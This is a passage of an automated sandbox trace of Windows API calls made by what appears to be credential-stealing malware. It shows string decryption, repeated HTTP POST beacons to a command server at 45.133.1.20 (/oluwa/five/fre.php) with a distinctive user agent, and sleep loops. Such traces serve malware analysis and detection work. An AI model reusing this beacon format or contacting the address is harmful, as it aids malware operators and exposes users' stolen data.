GetProcessHeap () returned 0x6a0000 [0294.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d80b8 [0294.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.653] CryptImportKey (in: hProv=0x6bf058, pbData=0x6d80b8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0294.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.654] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0294.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.655] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0294.655] GetProcessHeap () returned 0x6a0000 [0294.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d80b8 | out: hHeap=0x6a0000) returned 1 [0294.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.659] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0294.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.661] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0294.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.662] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0294.662] GetProcessHeap () returned 0x6a0000 [0294.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0294.663] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.664] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0294.664] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.665] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0294.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.666] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0294.667] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.669] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0294.669] GetProcessHeap () returned 0x6a0000 [0294.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0294.670] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0294.670] GetProcessHeap () returned 0x6a0000 [0294.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0294.671] GetProcessHeap () returned 0x6a0000 [0294.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0294.671] GetProcessHeap () returned 0x6a0000 [0294.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0294.671] GetProcessHeap () returned 0x6a0000 [0294.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0294.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.673] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0294.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.679] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0294.693] GetProcessHeap () returned 0x6a0000 [0294.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0294.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.695] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0294.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.696] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0294.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.697] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0294.697] GetProcessHeap () returned 0x6a0000 [0294.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0294.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.701] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0294.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.703] CryptDestroyKey (hKey=0x6ad020) returned 1 [0294.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0294.704] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0294.704] GetProcessHeap () returned 0x6a0000 [0294.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0294.705] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.705] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0294.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.707] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0294.708] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.708] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0294.709] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0294.709] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0294.709] GetProcessHeap () returned 0x6a0000 [0294.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0294.709] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0294.710] GetProcessHeap () returned 0x6a0000 [0294.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0294.710] socket (af=2, type=1, protocol=6) returned 0xb08 [0294.710] connect (s=0xb08, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0294.915] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0294.915] GetProcessHeap () returned 0x6a0000 [0294.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0294.915] GetProcessHeap () returned 0x6a0000 [0294.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0294.916] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0294.917] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0294.918] GetProcessHeap () returned 0x6a0000 [0294.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6da4c8 [0294.918] GetProcessHeap () returned 0x6a0000 [0294.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0294.918] GetProcessHeap () returned 0x6a0000 [0294.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0294.918] GetProcessHeap () returned 0x6a0000 [0294.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0294.920] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0294.921] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0294.921] GetProcessHeap () returned 0x6a0000 [0294.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0294.921] GetProcessHeap () returned 0x6a0000 [0294.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0294.922] send (s=0xb08, buf=0x6bd460*, len=242, flags=0) returned 242 [0294.923] send (s=0xb08, buf=0x6bb998*, len=159, flags=0) returned 159 [0294.923] GetProcessHeap () returned 0x6a0000 [0294.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0294.923] recv (in: s=0xb08, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0295.012] GetProcessHeap () returned 0x6a0000 [0295.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0295.013] GetProcessHeap () returned 0x6a0000 [0295.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0295.013] GetProcessHeap () returned 0x6a0000 [0295.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da4c8 | out: hHeap=0x6a0000) returned 1 [0295.014] GetProcessHeap () returned 0x6a0000 [0295.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0295.016] closesocket (s=0xb08) returned 0 [0295.018] GetProcessHeap () returned 0x6a0000 [0295.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0295.018] GetProcessHeap () returned 0x6a0000 [0295.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0295.018] GetProcessHeap () returned 0x6a0000 [0295.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0295.019] GetProcessHeap () returned 0x6a0000 [0295.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0295.020] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1828) returned 0xb08 [0295.022] Sleep (dwMilliseconds=0xea60) [0295.023] GetProcessHeap () returned 0x6a0000 [0295.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0295.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.025] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0295.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.084] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0295.204] GetProcessHeap () returned 0x6a0000 [0295.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c7938 [0295.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.206] CryptImportKey (in: hProv=0x6beb90, pbData=0x6c7938, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0295.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.207] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0295.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.208] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.208] GetProcessHeap () returned 0x6a0000 [0295.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7938 | out: hHeap=0x6a0000) returned 1 [0295.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.212] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0295.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.214] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0295.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.215] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0295.215] GetProcessHeap () returned 0x6a0000 [0295.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0295.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.216] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0295.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.218] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0295.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.222] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0295.223] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.224] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0295.224] GetProcessHeap () returned 0x6a0000 [0295.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0295.224] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0295.224] GetProcessHeap () returned 0x6a0000 [0295.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0295.225] GetProcessHeap () returned 0x6a0000 [0295.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0295.226] GetProcessHeap () returned 0x6a0000 [0295.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0295.226] GetProcessHeap () returned 0x6a0000 [0295.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0295.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.228] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0295.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.236] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0295.351] GetProcessHeap () returned 0x6a0000 [0295.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0295.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.353] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0295.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.414] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0295.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.416] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.416] GetProcessHeap () returned 0x6a0000 [0295.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0295.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.418] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0295.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.419] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0295.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.421] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0295.421] GetProcessHeap () returned 0x6a0000 [0295.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0295.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.422] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0295.520] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.520] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0295.521] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.521] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0295.522] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0295.523] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0295.523] GetProcessHeap () returned 0x6a0000 [0295.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0295.523] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0295.523] GetProcessHeap () returned 0x6a0000 [0295.523] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0295.523] socket (af=2, type=1, protocol=6) returned 0xb0c [0295.525] connect (s=0xb0c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0295.631] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0295.631] GetProcessHeap () returned 0x6a0000 [0295.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0295.632] GetProcessHeap () returned 0x6a0000 [0295.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0295.633] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0295.634] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0295.635] GetProcessHeap () returned 0x6a0000 [0295.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6da4c8 [0295.635] GetProcessHeap () returned 0x6a0000 [0295.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0295.635] GetProcessHeap () returned 0x6a0000 [0295.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0295.635] GetProcessHeap () returned 0x6a0000 [0295.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0295.636] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0295.637] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0295.637] GetProcessHeap () returned 0x6a0000 [0295.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0295.637] GetProcessHeap () returned 0x6a0000 [0295.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0295.637] send (s=0xb0c, buf=0x6bd460*, len=242, flags=0) returned 242 [0295.638] send (s=0xb0c, buf=0x6bb998*, len=159, flags=0) returned 159 [0295.638] GetProcessHeap () returned 0x6a0000 [0295.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0295.638] recv (in: s=0xb0c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0295.721] GetProcessHeap () returned 0x6a0000 [0295.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0295.721] GetProcessHeap () returned 0x6a0000 [0295.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0295.725] GetProcessHeap () returned 0x6a0000 [0295.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da4c8 | out: hHeap=0x6a0000) returned 1 [0295.726] GetProcessHeap () returned 0x6a0000 [0295.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0295.726] closesocket (s=0xb0c) returned 0 [0295.731] GetProcessHeap () returned 0x6a0000 [0295.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0295.731] GetProcessHeap () returned 0x6a0000 [0295.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0295.732] GetProcessHeap () returned 0x6a0000 [0295.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0295.732] GetProcessHeap () returned 0x6a0000 [0295.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0295.733] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x182c) returned 0xb0c [0295.736] Sleep (dwMilliseconds=0xea60) [0295.737] GetProcessHeap () returned 0x6a0000 [0295.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0295.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.739] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0295.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.750] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0295.772] GetProcessHeap () returned 0x6a0000 [0295.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0295.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.773] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0295.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.775] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0295.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0295.776] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.776] GetProcessHeap () returned 0x6a0000 [0295.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 